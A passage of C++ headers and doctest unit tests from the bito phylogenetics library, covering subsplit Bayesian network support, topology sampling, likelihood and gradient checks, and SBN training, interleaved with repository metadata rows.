currently loaded set of topologies. Node::TopologyCounter topology_counter_; TSBNSupport sbn_support_; MersenneTwister mersenne_twister_; inline void SetSeed(uint64_t seed) { mersenne_twister_.SetSeed(seed); } // Make a likelihood engine with the given specification. void MakeGPEngine(const EngineSpecification &engine_specification, const PhyloModelSpecification &model_specification) { CheckSequencesAndTreesLoaded(); SitePattern site_pattern(alignment_, TagTaxonMap()); engine_ = std::make_unique<Engine>(engine_specification, model_specification, site_pattern); } // Sample an integer index in [range.first, range.second) according to // sbn_parameters_. size_t SampleIndex(Range range) const { const auto &[start, end] = range; Assert(start < end && static_cast<Eigen::Index>(end) <= sbn_parameters_.size(), "SampleIndex given an invalid range."); // We do not want to overwrite sbn_parameters so we make a copy. EigenVectorXd sbn_parameters_subrange = sbn_parameters_.segment(start, end - start); NumericalUtils::ProbabilityNormalizeInLog(sbn_parameters_subrange); NumericalUtils::Exponentiate(sbn_parameters_subrange); std::discrete_distribution<> distribution(sbn_parameters_subrange.begin(), sbn_parameters_subrange.end()); // We have to add on range.first because we have taken a slice of the full // array, and the sampler treats the beginning of this slice as zero. auto result = start + static_cast<size_t>(distribution(mersenne_twister_.GetGenerator())); Assert(result < end, "SampleIndex sampled a value out of range."); return result; } Node::NodePtr SampleTopology(bool rooted) const { // Start by sampling a rootsplit. size_t rootsplit_index = SampleIndex(std::pair<size_t, size_t>(0, sbn_support_.RootsplitCount())); const Bitset &rootsplit = sbn_support_.RootsplitsAt(rootsplit_index); auto topology = rooted ? SampleTopology(rootsplit) : SampleTopology(rootsplit)->Deroot(); topology->Polish(); return topology; } // The input to this function is a parent subsplit (of length 2n). Node::NodePtr SampleTopology(const Bitset &parent_subsplit) const { auto process_subsplit = [this](const Bitset &parent) { auto singleton_option = parent.SubsplitGetClade(SubsplitClade::Right).SingletonOption(); if (singleton_option) { return Node::Leaf(*singleton_option); } // else auto child_index = SampleIndex(sbn_support_.ParentToRangeAt(parent)); return SampleTopology(sbn_support_.IndexToChildAt(child_index)); }; return Node::Join(process_subsplit(parent_subsplit), process_subsplit(parent_subsplit.SubsplitRotate())); } // Clear all of the state that depends on the current tree collection. void ClearTreeCollectionAssociatedState() { sbn_parameters_.resize(0); topology_counter_.clear(); sbn_support_ = TSBNSupport(); } void PushBackRangeForParentIfAvailable(const Bitset &parent, RangeVector &range_vector) { if (sbn_support_.ParentInSupport(parent)) { range_vector.push_back(sbn_support_.ParentToRangeAt(parent)); } } RangeVector GetSubsplitRanges(const SizeVector &rooted_representation) { RangeVector subsplit_ranges; // PROFILE: should we be reserving here? subsplit_ranges.emplace_back(0, sbn_support_.RootsplitCount()); Bitset root = sbn_support_.RootsplitsAt(rooted_representation[0]); PushBackRangeForParentIfAvailable(root, subsplit_ranges); PushBackRangeForParentIfAvailable(root.SubsplitRotate(), subsplit_ranges); // Starting at 1 here because we took care of the rootsplit above (the 0th element). for (size_t i = 1; i < rooted_representation.size(); i++) { Bitset child = sbn_support_.IndexToChildAt(rooted_representation[i]); PushBackRangeForParentIfAvailable(child, subsplit_ranges); PushBackRangeForParentIfAvailable(child.SubsplitRotate(), subsplit_ranges); } return subsplit_ranges; } static EigenVectorXd CalculateMultiplicativeFactors(EigenVectorXdRef log_f) { double tree_count = log_f.size(); double log_F = NumericalUtils::LogSum(log_f); double hat_L = log_F - log(tree_count); EigenVectorXd tilde_w = log_f.array() - log_F; tilde_w = tilde_w.array().exp(); return hat_L - tilde_w.array(); } static EigenVectorXd CalculateVIMCOMultiplicativeFactors(EigenVectorXdRef log_f) { // Use the geometric mean as \hat{f}(\tau^{-j}, \theta^{-j}), in eq:f_hat in // the implementation notes. size_t tree_count = log_f.size(); double log_tree_count = log(tree_count); double sum_of_log_f = log_f.sum(); // This has jth entry \hat{f}_{\bm{\phi},{\bm{\psi}}}(\tau^{-j},\bm{\theta}^{-j}), // i.e. the log of the geometric mean of each item other than j. EigenVectorXd log_geometric_mean = (sum_of_log_f - log_f.array()) / (tree_count - 1); EigenVectorXd per_sample_signal(tree_count); // This is a vector of entries that when summed become the parenthetical expression // in eq:perSampleLearning. EigenVectorXd log_f_perturbed = log_f; for (size_t j = 0; j < tree_count; j++) { log_f_perturbed(j) = log_geometric_mean(j); per_sample_signal(j) = log_f_perturbed.redux(NumericalUtils::LogAdd) - log_tree_count; // Reset the value. log_f_perturbed(j) = log_f(j); } EigenVectorXd multiplicative_factors = CalculateMultiplicativeFactors(log_f); multiplicative_factors -= per_sample_signal; return multiplicative_factors; } }; #ifdef DOCTEST_LIBRARY_INCLUDED #endif // DOCTEST_LIBRARY_INCLUDED
20,656
C++
.h
443
40.774266
88
0.703384
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,118
sbn_support.hpp
phylovi_bito/src/sbn_support.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // In our formulation of variational Bayes phylogenetics, we do inference of continuous // parameters with respect to a "subsplit support", which is the collection of // rootsplits and PCSPs that are allowed to be nonzero. // // We implement this concept as an SBNSupport here. We store the support as a collection // of indexing maps that map from Bitset representations of rootsplits and PCSPs to some // indexing scheme. Details differ if we are looking at rooted or unrooted trees, hence // this class gets subclassed by RootedSBNSupport and UnrootedSBNSupport. // // To learn more about these indexer maps, see the unit tests in rooted_sbn_instance.hpp // and unrooted_sbn_instance.hpp. #pragma once #include "psp_indexer.hpp" #include "sbn_probability.hpp" class SBNSupport { public: explicit SBNSupport(StringVector taxon_names) : taxon_names_(std::move(taxon_names)){}; inline size_t GPCSPCount() const { return gpcsp_count_; } inline bool Empty() const { return GPCSPCount() == 0; } inline size_t TaxonCount() const { return taxon_names_.size(); } inline const StringVector &TaxonNames() const { return taxon_names_; } inline size_t RootsplitCount() const { return rootsplits_.size(); } const Bitset &RootsplitsAt(size_t rootsplit_idx) const { return rootsplits_.at(rootsplit_idx); } const size_t &IndexerAt(const Bitset &bitset) const { return indexer_.at(bitset); } inline bool ParentInSupport(const Bitset &parent) const { return parent_to_child_range_.count(parent) > 0; } inline const SizePair &ParentToRangeAt(const Bitset &parent) const { return parent_to_child_range_.at(parent); } inline const Bitset &IndexToChildAt(size_t child_idx) const { return index_to_child_.at(child_idx); } const BitsetSizePairMap &ParentToRange() const { return parent_to_child_range_; } const BitsetSizeMap &Indexer() const { return indexer_; } PSPIndexer BuildPSPIndexer() const { return PSPIndexer(rootsplits_, indexer_); } // "Pretty" string representation of the indexer. StringVector PrettyIndexer() const; void PrettyPrintIndexer() const; // Return indexer_ and parent_to_child_range_ converted into string-keyed maps. std::tuple<StringSizeMap, StringSizePairMap> GetIndexers() const; // Get the indexer, but reversed and with bitsets appropriately converted to // strings. StringVector StringReversedIndexer() const; void ProbabilityNormalizeSBNParametersInLog(EigenVectorXdRef sbn_parameters) const; protected: // A vector of the taxon names. StringVector taxon_names_; // The total number of rootsplits and PCSPs. size_t gpcsp_count_ = 0; // The master indexer for SBN parameters. BitsetSizeMap indexer_; // The collection of rootsplits, with the same indexing as in the indexer_. BitsetVector rootsplits_; // A map going from the index of a PCSP to its child. SizeBitsetMap index_to_child_; // A map going from a parent subsplit to the range of indices in // sbn_parameters_ with its children. See the definition of Range for the indexing // convention. BitsetSizePairMap parent_to_child_range_; };
3,246
C++
.h
67
45.716418
88
0.76207
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,119
doctest_constants.hpp
phylovi_bito/src/doctest_constants.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #ifdef DOCTEST_LIBRARY_INCLUDED // Below we use 99999999 is the default value if a rootsplit or PCSP is missing. const size_t out_of_sample_index = 99999999; #endif // DOCTEST_LIBRARY_INCLUDED
333
C++
.h
7
46
80
0.791925
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,120
unrooted_sbn_instance.hpp
phylovi_bito/src/unrooted_sbn_instance.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include "generic_sbn_instance.hpp" #include "unrooted_sbn_support.hpp" using PreUnrootedSBNInstance = GenericSBNInstance<UnrootedTreeCollection, UnrootedSBNSupport, UnrootedIndexerRepresentation>; template class GenericSBNInstance<UnrootedTreeCollection, UnrootedSBNSupport, UnrootedIndexerRepresentation>; class UnrootedSBNInstance : public PreUnrootedSBNInstance { public: using PreUnrootedSBNInstance::PreUnrootedSBNInstance; // ** SBN-related items // max_iter is the maximum number of EM iterations to do, while score_epsilon // is the cutoff for score improvement. EigenVectorXd TrainExpectationMaximization(double alpha, size_t max_iter, double score_epsilon = 0.); // Sample a topology from the SBN. using PreUnrootedSBNInstance::SampleTopology; Node::NodePtr SampleTopology() const; // Sample trees and store them internally void SampleTrees(size_t count); // Get PSP indexer representations of the trees in tree_collection_. std::vector<SizeVectorVector> MakePSPIndexerRepresentations() const; // Return a ragged vector of vectors such that the ith vector is the // collection of branch lengths in the current tree collection for the ith // split. DoubleVectorVector SplitLengths() const; // Turn an IndexerRepresentation into a string representation of the underying // bitsets. This is really just so that we can make a test of indexer // representations. StringSetVector StringIndexerRepresentationOf( const UnrootedIndexerRepresentation &indexer_representation) const; StringSetVector StringIndexerRepresentationOf(const Node::NodePtr &topology, size_t out_of_sample_index) const; // This function is really just for testing-- it recomputes counters from // scratch. std::pair<StringSizeMap, StringPCSPMap> SplitCounters() const; // ** Phylogenetic likelihood std::vector<double> LogLikelihoods( std::optional<PhyloFlags> external_flags = std::nullopt); template <class VectorType> std::vector<double> LogLikelihoods(const VectorType &flag_vec, const bool is_run_defaults); // For each loaded tree, return the phylogenetic gradient. std::vector<PhyloGradient> PhyloGradients( std::optional<PhyloFlags> external_flags = std::nullopt); template <class VectorType> std::vector<PhyloGradient> PhyloGradients(const VectorType &flag_vec, const bool is_run_defaults); // Topology gradient for unrooted trees. // Assumption: This function is called from Python side // after the trees (both the topology and the branch lengths) are sampled. EigenVectorXd TopologyGradients(EigenVectorXdRef log_f, bool use_vimco = true); // Computes gradient WRT \phi of log q_{\phi}(\tau). // IndexerRepresentation contains all rootings of \tau. // normalized_sbn_parameters_in_log is a cache; see implementation of // TopologyGradients to see how it works. It would be private except that // we want to be able to test it. EigenVectorXd GradientOfLogQ( EigenVectorXdRef normalized_sbn_parameters_in_log, const UnrootedIndexerRepresentation &indexer_representation); // ** I/O void ReadNewickFile(const std::string &fname, const bool sort_taxa = true); void ReadNexusFile(const std::string &fname, const bool sort_taxa = true); protected: void PushBackRangeForParentIfAvailable( const Bitset &parent, UnrootedSBNInstance::RangeVector &range_vector); RangeVector GetSubsplitRanges( const RootedIndexerRepresentation &rooted_representation); }; #ifdef DOCTEST_LIBRARY_INCLUDED #include "doctest_constants.hpp" TEST_CASE("UnrootedSBNInstance: indexer and PSP representations") { UnrootedSBNInstance inst("charlie"); inst.ReadNewickFile("data/five_taxon_unrooted.nwk", false); inst.ProcessLoadedTrees(); auto pretty_indexer = inst.PrettyIndexer(); // The indexer_ is to index the sbn_parameters_. Note that neither of these // data structures attempt to catalog the complete collection of rootsplits or // PCSPs, but just those that are present for some rooting of the input trees. // // The indexer_ and sbn_parameters_ are laid out as follows (I'll just call it // the "index" in what follows). Say there are rootsplit_count rootsplits in // the support. // The first rootsplit_count entries of the index are assigned to the // rootsplits (again, those rootsplits that are present for some rooting of // the unrooted input trees). For the five_taxon example, this goes as follows: StringSet correct_pretty_rootsplits( {"00000|11111|01110", "00000|11111|01010", "00000|11111|00101", "00000|11111|00111", "00000|11111|00001", "00000|11111|00011", "00000|11111|00010", "00000|11111|00100", "00000|11111|00110", "00000|11111|01000", "00000|11111|01111", "00000|11111|01001"}); StringSet pretty_rootsplits( pretty_indexer.begin(), pretty_indexer.begin() + correct_pretty_rootsplits.size()); CHECK(correct_pretty_rootsplits == pretty_rootsplits); // The rest of the entries of the index are laid out as blocks of parameters // for PCSPs that share the same parent. Take a look at the description of // PCSP bitsets (and the unit tests) in bitset.hpp to understand the notation // used here. // // For example, here are four PCSPs that all share the parent 00001|11110: StringSet correct_pretty_pcsp_block({"00001|11110|01110", "00001|11110|00010", "00001|11110|01000", "00001|11110|00100"}); StringSet pretty_indexer_set(pretty_indexer.begin(), pretty_indexer.end()); // It's true that this test doesn't show the block-ness, but it wasn't easy to // show off this feature in a way that wasn't compiler dependent. // You can see it by printing out a pretty_indexer if you wish. A test exhibiting // block structure appeas in rooted_sbn_instance.hpp. for (auto pretty_pcsp : correct_pretty_pcsp_block) { CHECK(pretty_indexer_set.find(pretty_pcsp) != pretty_indexer_set.end()); } // Now we can look at some tree representations. We get these by calling // IndexerRepresentationOf on a tree topology. This function "digests" the // tree by representing all of the PCSPs as bitsets which it can then look up // in the indexer_. // It then spits them out as the rootsplit and PCSP indices. // The following tree is (2,(1,3),(0,4));, or with internal nodes (2,(1,3)5,(0,4)6)7 auto indexer_test_topology_1 = Node::OfParentIdVector({6, 5, 7, 5, 6, 7, 7}); // Here we look at the indexer representation of this tree. Rather than having // the indices themselves, which is what IndexerRepresentationOf actually // outputs, we have string representations of the features corresponding to // those indices. // See sbn_maps.hpp for more description of these indexer representations. StringSetVector correct_representation_1( // The indexer representations for each of the possible virtual rootings. // For example, this first one is for rooting at the edge leading to leaf // 0, the second for rooting at leaf 1, etc. {{"00000|11111|01111", "10000|01111|00001", "00001|01110|00100", "00100|01010|00010"}, {"00000|11111|01000", "01000|10111|00010", "00100|10001|00001", "00010|10101|00100"}, {"00000|11111|00100", "10001|01010|00010", "01010|10001|00001", "00100|11011|01010"}, {"00000|11111|00010", "00010|11101|01000", "00100|10001|00001", "01000|10101|00100"}, {"00000|11111|00001", "00001|11110|01110", "10000|01110|00100", "00100|01010|00010"}, {"00000|11111|01010", "10101|01010|00010", "00100|10001|00001", "01010|10101|00100"}, {"00000|11111|01110", "00100|01010|00010", "10001|01110|00100", "01110|10001|00001"}}); CHECK_EQ( inst.StringIndexerRepresentationOf(indexer_test_topology_1, out_of_sample_index), correct_representation_1); // See the "concepts" part of the online documentation to learn about PSP indexing. auto correct_psp_representation_1 = StringVectorVector({{"10000|01111", "10111|01000", "11011|00100", "11101|00010", "11110|00001", "10101|01010", "10001|01110"}, {"", "", "", "", "", "01000|00010", "10000|00001"}, {"01110|00001", "10101|00010", "10001|01010", "10101|01000", "10000|01110", "10001|00100", "01010|00100"}}); CHECK_EQ(inst.psp_indexer_.StringRepresentationOf(indexer_test_topology_1), correct_psp_representation_1); // Same as above but for (((0,1),2),3,4);, or with internal nodes (((0,1)5,2)6,3,4)7; auto indexer_test_topology_2 = Node::OfParentIdVector({5, 5, 6, 7, 7, 6, 7}); StringSetVector correct_representation_2( {{"00000|11111|01111", "10000|01111|00111", "00100|00011|00001", "01000|00111|00011"}, {"00000|11111|01000", "01000|10111|00111", "00100|00011|00001", "10000|00111|00011"}, {"00000|11111|00100", "00100|11011|00011", "11000|00011|00001", "00011|11000|01000"}, {"00000|11111|00010", "00100|11000|01000", "00001|11100|00100", "00010|11101|00001"}, {"00000|11111|00001", "00100|11000|01000", "00001|11110|00010", "00010|11100|00100"}, {"00000|11111|00111", "00111|11000|01000", "00100|00011|00001", "11000|00111|00011"}, {"00000|11111|00011", "00100|11000|01000", "11100|00011|00001", "00011|11100|00100"}}); CHECK_EQ( inst.StringIndexerRepresentationOf(indexer_test_topology_2, out_of_sample_index), correct_representation_2); auto correct_psp_representation_2 = StringVectorVector({{"10000|01111", "10111|01000", "11011|00100", "11101|00010", "11110|00001", "11000|00111", "11100|00011"}, {"", "", "", "", "", "10000|01000", "11000|00100"}, {"01000|00111", "10000|00111", "11000|00011", "11100|00001", "11100|00010", "00100|00011", "00010|00001"}}); CHECK_EQ(inst.psp_indexer_.StringRepresentationOf(indexer_test_topology_2), correct_psp_representation_2); // Test of RootedSBNMaps::IndexerRepresentationOf. // It's a little surprising to see this here in unrooted land, but these are actually // complementary tests to those found in rooted_sbn_instance.hpp, with a larger // subsplit support because we deroot the trees. // Topology is ((((0,1),2),3),4);, or with internal nodes ((((0,1)5,2)6,3)7,4)8; auto indexer_test_rooted_topology_1 = Node::OfParentIdVector({5, 5, 6, 7, 8, 6, 7, 8}); auto correct_rooted_indexer_representation_1 = StringSet({"00000|11111|00001", "00001|11110|00010", "00010|11100|00100", "00100|11000|01000"}); CHECK_EQ(inst.StringIndexerRepresentationOf({RootedSBNMaps::IndexerRepresentationOf( inst.SBNSupport().Indexer(), indexer_test_rooted_topology_1, out_of_sample_index)})[0], correct_rooted_indexer_representation_1); // Topology is (((0,1),2),(3,4));, or with internal nodes (((0,1)5,2)6,(3,4)7)8; auto indexer_test_rooted_topology_2 = Node::OfParentIdVector({5, 5, 6, 7, 7, 6, 8, 8}); auto correct_rooted_indexer_representation_2 = StringSet({"00000|11111|00011", "11100|00011|00001", "00011|11100|00100", "00100|11000|01000"}); CHECK_EQ(inst.StringIndexerRepresentationOf({RootedSBNMaps::IndexerRepresentationOf( inst.SBNSupport().Indexer(), indexer_test_rooted_topology_2, out_of_sample_index)})[0], correct_rooted_indexer_representation_2); } TEST_CASE("UnrootedSBNInstance: likelihood and gradient") { UnrootedSBNInstance inst("charlie"); inst.ReadNewickFile("data/hello.nwk", false); inst.ReadFastaFile("data/hello.fasta"); PhyloModelSpecification simple_specification{"JC69", "constant", "strict"}; inst.PrepareForPhyloLikelihood(simple_specification, 2); for (auto ll : inst.LogLikelihoods()) { CHECK_LT(fabs(ll - -84.852358), 0.000001); } inst.ReadNexusFile("data/DS1.subsampled_10.t", false); inst.ReadFastaFile("data/DS1.fasta"); std::vector<BeagleFlags> vector_flag_options{BEAGLE_FLAG_VECTOR_NONE, BEAGLE_FLAG_VECTOR_SSE}; std::vector<bool> tip_state_options{false, true}; for (const auto vector_flag : vector_flag_options) { for (const auto tip_state_option : tip_state_options) { inst.PrepareForPhyloLikelihood(simple_specification, 2, {vector_flag}, tip_state_option); auto likelihoods = inst.LogLikelihoods(); std::vector<double> pybeagle_likelihoods( {-14582.995273982739, -6911.294207416366, -6916.880235529542, -6904.016888831189, -6915.055570693576, -6915.50496696512, -6910.958836661867, -6909.02639968063, -6912.967861935749, -6910.7871105783515}); for (size_t i = 0; i < likelihoods.size(); i++) { CHECK_LT(fabs(likelihoods[i] - pybeagle_likelihoods[i]), 0.00011); } auto gradients = inst.PhyloGradients(); // Test the log likelihoods. for (size_t i = 0; i < likelihoods.size(); i++) { CHECK_LT(fabs(gradients[i].log_likelihood_ - pybeagle_likelihoods[i]), 0.00011); } // Test the gradients for the last tree. auto last = gradients.back(); std::sort(last.gradient_["branch_lengths"].begin(), last.gradient_["branch_lengths"].end()); // Zeros are for the root and one of the descendants of the root. std::vector<double> physher_gradients = { -904.18956, -607.70500, -562.36274, -553.63315, -542.26058, -539.64210, -463.36511, -445.32555, -414.27197, -412.84218, -399.15359, -342.68038, -306.23644, -277.05392, -258.73681, -175.07391, -171.59627, -168.57646, -150.57623, -145.38176, -115.15798, -94.86412, -83.02880, -80.09165, -69.00574, -51.93337, 0.00000, 0.00000, 16.17497, 20.47784, 58.06984, 131.18998, 137.10799, 225.73617, 233.92172, 253.49785, 255.52967, 259.90378, 394.00504, 394.96619, 396.98933, 429.83873, 450.71566, 462.75827, 471.57364, 472.83161, 514.59289, 650.72575, 888.87834, 913.96566, 927.14730, 959.10746, 2296.55028}; for (size_t i = 0; i < last.gradient_["branch_lengths"].size(); i++) { CHECK_LT(fabs(last.gradient_["branch_lengths"][i] - physher_gradients[i]), 0.0001); } // Test rescaling inst.SetRescaling(true); auto likelihoods_rescaling = inst.LogLikelihoods(); // Likelihoods from LogLikelihoods() for (size_t i = 0; i < likelihoods_rescaling.size(); i++) { CHECK_LT(fabs(likelihoods_rescaling[i] - pybeagle_likelihoods[i]), 0.00011); } // Likelihoods from BranchGradients() inst.PrepareForPhyloLikelihood(simple_specification, 1, {}, tip_state_option); auto gradients_rescaling = inst.PhyloGradients(); for (size_t i = 0; i < gradients_rescaling.size(); i++) { CHECK_LT(fabs(gradients_rescaling[i].log_likelihood_ - pybeagle_likelihoods[i]), 0.00011); } // Gradients auto last_rescaling = gradients_rescaling.back(); auto branch_lengths_gradient = last_rescaling.gradient_["branch_lengths"]; std::sort(branch_lengths_gradient.begin(), branch_lengths_gradient.end()); for (size_t i = 0; i < branch_lengths_gradient.size(); i++) { CHECK_LT(fabs(branch_lengths_gradient[i] - physher_gradients[i]), 0.0001); } } } } TEST_CASE("UnrootedSBNInstance: likelihood and gradient with Weibull") { UnrootedSBNInstance inst("charlie"); PhyloModelSpecification simple_specification{"JC69", "weibull+4", "strict"}; inst.ReadNexusFile("data/DS1.subsampled_10.t", false); inst.ReadFastaFile("data/DS1.fasta"); std::vector<double> physher_likelihoods( {-9456.1201098061, -6624.4110704332, -6623.4474776131, -6617.25658038029, -6627.5385571548, -6621.6155048722, -6622.3314942713, -6618.7695717585, -6616.3837517370, -6623.8295828648}); // First element of each gradient std::vector<double> physher_gradients_bl0( {-126.890527, 157.251275, 138.202510, -180.311856, 417.562897, -796.450894, -173.744375, -70.693513, 699.190754, -723.034349}); std::vector<BeagleFlags> vector_flag_options{BEAGLE_FLAG_VECTOR_NONE, BEAGLE_FLAG_VECTOR_SSE}; std::vector<bool> tip_state_options{false, true}; for (const auto vector_flag : vector_flag_options) { for (const auto tip_state_option : tip_state_options) { inst.PrepareForPhyloLikelihood(simple_specification, 2, {vector_flag}, tip_state_option); auto param_block_map = inst.GetPhyloModelParamBlockMap(); param_block_map.at(WeibullSiteModel::shape_key_).setConstant(0.1); auto likelihoods = inst.LogLikelihoods(); for (size_t i = 0; i < likelihoods.size(); i++) { CHECK_LT(fabs(likelihoods[i] - physher_likelihoods[i]), 0.00011); } auto gradients = inst.PhyloGradients(); for (size_t i = 0; i < gradients.size(); i++) { CHECK_LT(fabs(gradients[i].gradient_["branch_lengths"][0] - physher_gradients_bl0[i]), 0.00011); } // Test rescaling inst.SetRescaling(true); auto likelihoods_rescaling = inst.LogLikelihoods(); // Likelihoods from LogLikelihoods() for (size_t i = 0; i < likelihoods_rescaling.size(); i++) { CHECK_LT(fabs(likelihoods_rescaling[i] - physher_likelihoods[i]), 0.00011); } auto gradients_rescaling = inst.PhyloGradients(); for (size_t i = 0; i < gradients.size(); i++) { CHECK_LT(fabs(gradients_rescaling[i].gradient_["branch_lengths"][0] - physher_gradients_bl0[i]), 0.00011); } } } } TEST_CASE("UnrootedSBNInstance: SBN training") { UnrootedSBNInstance inst("charlie"); inst.ReadNewickFile("data/DS1.100_topologies.nwk", false); inst.ProcessLoadedTrees(); // These "Expected" functions are defined in sbn_probability.hpp. const auto expected_SA = ExpectedSAVector(); inst.TrainSimpleAverage(); CheckVectorXdEquality(inst.CalculateSBNProbabilities(), expected_SA, 1e-12); // Expected EM vectors with alpha = 0. const auto [expected_EM_0_1, expected_EM_0_23] = ExpectedEMVectorsAlpha0(); // 1 iteration of EM with alpha = 0. inst.TrainExpectationMaximization(0., 1); CheckVectorXdEquality(inst.CalculateSBNProbabilities(), expected_EM_0_1, 1e-12); // 23 iterations of EM with alpha = 0. inst.TrainExpectationMaximization(0., 23); CheckVectorXdEquality(inst.CalculateSBNProbabilities(), expected_EM_0_23, 1e-12); // 100 iteration of EM with alpha = 0.5. const auto expected_EM_05_100 = ExpectedEMVectorAlpha05(); inst.TrainExpectationMaximization(0.5, 100); CheckVectorXdEquality(inst.CalculateSBNProbabilities(), expected_EM_05_100, 1e-5); } TEST_CASE("UnrootedSBNInstance: tree sampling") { UnrootedSBNInstance inst("charlie"); inst.ReadNewickFile("data/five_taxon_unrooted.nwk", false); inst.ProcessLoadedTrees(); inst.TrainSimpleAverage(); // Count the frequencies of rooted trees in a file. size_t rooted_tree_count_from_file = 0; RootedIndexerRepresentationSizeDict counter_from_file(0); for (const auto &indexer_representation : inst.MakeIndexerRepresentations()) { RootedSBNMaps::IncrementRootedIndexerRepresentationSizeDict(counter_from_file, indexer_representation); rooted_tree_count_from_file += indexer_representation.size(); } // Count the frequencies of trees when we sample after training with // SimpleAverage. size_t sampled_tree_count = 1'000'000; RootedIndexerRepresentationSizeDict counter_from_sampling(0); ProgressBar progress_bar(sampled_tree_count / 1000); for (size_t sample_idx = 0; sample_idx < sampled_tree_count; ++sample_idx) { const auto rooted_topology = inst.SampleTopology(true); RootedSBNMaps::IncrementRootedIndexerRepresentationSizeDict( counter_from_sampling, RootedSBNMaps::IndexerRepresentationOf(inst.SBNSupport().Indexer(), rooted_topology, out_of_sample_index)); if (sample_idx % 1000 == 0) { ++progress_bar; progress_bar.display(); } } // These should be equal in the limit when we're training with SA. for (const auto &[key, _] : counter_from_file) { std::ignore = _; double observed = static_cast<double>(counter_from_sampling.at(key)) / sampled_tree_count; double expected = static_cast<double>(counter_from_file.at(key)) / rooted_tree_count_from_file; CHECK_LT(fabs(observed - expected), 5e-3); } progress_bar.done(); } TEST_CASE("UnrootedSBNInstance: gradient of log q_{phi}(tau) WRT phi") { UnrootedSBNInstance inst("charlie"); // File gradient_test.t contains two trees: // ((0,1), 2, (3,4)) and // ((0,1), (2,3), 4). inst.ReadNexusFile("data/gradient_test.t"); inst.ProcessLoadedTrees(); // The number of rootsplits across all of the input trees. size_t num_rootsplits = 8; // Manual enumeration shows that there are 31 PCSP's. size_t num_pcsp = inst.sbn_parameters_.size() - num_rootsplits; // Test for K = 1 tree. size_t K = 1; inst.tree_collection_.trees_.clear(); // Generate a tree, // \tau = ((0,1),(2,3),4) with internal node labels ((0,1)5,(2,3)6,4)7. std::vector<size_t> tau_indices = {5, 5, 6, 6, 7, 7, 7}; auto tau = UnrootedTree::OfParentIdVector(tau_indices); inst.tree_collection_.trees_.push_back(tau); // Initialize sbn_parameters_ to 0's and normalize, which is going to give a uniform // distribution for rootsplits and PCSP distributions. inst.sbn_parameters_.setZero(); EigenVectorXd normalized_sbn_parameters_in_log = inst.sbn_parameters_; inst.ProbabilityNormalizeSBNParametersInLog(normalized_sbn_parameters_in_log); // Because this is a uniform distribution, each rootsplit \rho has P(\rho) = 1/8. // // We're going to start by computing the rootsplit gradient. // There are 7 possible rootings of \tau. // For example consider rooting on the 014|23 split, yielding the following subsplits: // 014|23, 2|3, 01|4, 0|1. // Each of the child subsplits are the only possible subsplit, // except for the root where it has probability 1/8. Hence, the probability // for this tree is 1/8 x 1 x 1 x 1 = 1/8. // Now, consider rooting on the 0|1234 split, yielding the following subsplits: // 0|1234, 1|234, 23|4, 2|3. // The probability for this tree is 1/8 x 1 x 1/2 x 1 = 1/16, where the 1/2 comes from // the fact that we can have 23|4 or 2|34. // // Each of the remaining 5 trees has the same probability: the product of // 1/8 for the rootsplit and 1/2 for one of the subsplit resolutions of 234. // One can see this because the only way for there not to be ambiguity in the // resolution of the splitting of 234 is for one to take 014|23 as the rootsplit. // // Hence, q(\tau) = 6 x 1/16 + 1 x 1/8 = 8/16 = 0.5. // Note that there are a total of 8 rootsplits; 7 are possible rootsplits of // the sampled tree \tau but one rootsplit, // 014|23 is not observed rooting of \tau and hence, // the gradient for 014|23 is simply -P(014|23) = -1/8. // // The gradient with respect to each of the 7 rootsplits is given by // P(\tau_{\rho})/q(\tau) - P(\rho) via eq:rootsplitGrad, // which is equal to // (1/8) / (0.5) - 1/8 = 1/8 for the tree with \rho = 34|125 and // (1/16) / (0.5) - 1/8 = 0 for 6 remaining trees. EigenVectorXd expected_grad_rootsplit(8); expected_grad_rootsplit << -1. / 8, 0, 0, 0, 0, 0, 0, 1. / 8; auto indexer_representations = inst.MakeIndexerRepresentations(); EigenVectorXd grad_log_q = inst.GradientOfLogQ(normalized_sbn_parameters_in_log, indexer_representations.at(0)); EigenVectorXd realized_grad_rootsplit = grad_log_q.segment(0, 8); // Sort them and compare against sorted version of // realized_grad_rootsplit[0:7]. std::sort(realized_grad_rootsplit.begin(), realized_grad_rootsplit.end()); CheckVectorXdEquality(realized_grad_rootsplit, expected_grad_rootsplit, 1e-8); // Manual enumeration shows that the entries corresponding to PCSP should have // 6 entries with -1/16 and 6 entries with 1/16 and the rest with 0's. // For example, consider the tree ((0,1),(2,3),4), which has the following subsplits: // 0123|4, 01|23, 0|1, 2|3. // Note the subsplit s = 01|23 is one of two choices for // the parent subsplit t = 0123|4, // since 0123|4 can also be split into s' = 012|3. // Let \rho = 0123|4, the gradient for 01|23 is given by: // (1/q(\tau)) P(\tau_{\rho}) * (1 - P(01|23 | 0123|4)) // = 2 * (1/16) * (1-0.5) = 1/16. // The gradient for s' = 012|3 is, // (1/q(\tau)) P(\tau_{\rho}) * -P(012|3 | 0123|4) // = 2 * (1/16) * -0.5 = -1/16. // The gradient for the following PCSP are 1/16 as above. // 014|3 | 0134|2 // 014|2 | 0124|3 // 01|23 | 0123|4 // 23|4 | 01|234 // 23|4 | 1|234 // 23|4 | 0|234 // And each of these have an alternate subsplit s' that gets a gradient of -1/16. // Each of the other PCSP gradients are 0 either because its parent support // never appears in the tree or it represents the only child subsplit. EigenVectorXd expected_grad_pcsp = EigenVectorXd::Zero(num_pcsp); expected_grad_pcsp.segment(0, 6).setConstant(-1. / 16); expected_grad_pcsp.segment(num_pcsp - 6, 6).setConstant(1. / 16); EigenVectorXd realized_grad_pcsp = grad_log_q.tail(num_pcsp); std::sort(realized_grad_pcsp.begin(), realized_grad_pcsp.end()); CheckVectorXdEquality(realized_grad_pcsp, expected_grad_pcsp, 1e-8); // We'll now change the SBN parameters and check the gradient there. // If we root at 0123|4, then the only choice we have is between the following s and // s' as described above. // The PCSP s|t = (01|23) | (0123|4) corresponds to 00001|11110|00110. // The 